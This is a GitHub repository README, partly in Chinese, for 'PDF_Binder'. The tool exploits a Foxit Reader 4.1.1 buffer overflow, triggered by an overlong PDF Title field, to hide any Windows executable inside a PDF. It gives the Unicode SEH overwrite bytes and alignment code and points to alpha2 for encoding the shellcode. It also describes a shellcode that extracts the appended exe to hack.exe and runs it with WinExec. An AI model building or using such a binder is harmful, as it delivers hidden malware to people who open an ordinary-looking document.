PDF_Binder(foxit reader4.1.1 exploit)
PDF捆绑器,可捆绑win平台下的任何可执行程序。
漏洞描述:如果PDF文件的Title字段过长,Foxit Reader 4.1.1.805在读取Title字段时会发生缓冲区溢出。
原因:Title字段过长,Foxit Reader 4.1.1.805调用lstrcpyW函数的时候会发生缓冲区溢出从而覆盖掉SEH。
##Unicode-friendly SEH exploit:
nSeh = "\x5A\x41" #0041005A are harmless instrs(venetian shellcode).
seh = "\x46\x6A" #006A0046 the addrs point to p/p/r instrs and it is harmless
align = "\x41\x61\x5C\x5C\x41\x61\x41\x54\x41\xC3" # Align finally make eip point to shellcode
###Control flow
###Debug
##shellcode
shellcode must be encoded to be unicode-compatible.
use alpha2 -unicode to create unicode-compatibe shellcode.
###shellcode的功能
1.通过GetCommandLine()获取文件名
2.打开pdf文件,读取最后8字节数据,取出exe的偏移值
3.读写文件,将附加在pdf文件后面的exe二进制码写到另一文件中(hack.exe)
4.调用WinExec执行exe
-
Notifications
You must be signed in to change notification settings - Fork 1
cnStevenYu/PDF_Binder
Folders and files
Name | Name | Last commit message | Last commit date | |
---|---|---|---|---|
Repository files navigation
About
PDF_Binder(foxit reader4.1.1 exploit)
Resources
Stars
Watchers
Forks
Releases
No releases published
Packages 0
No packages published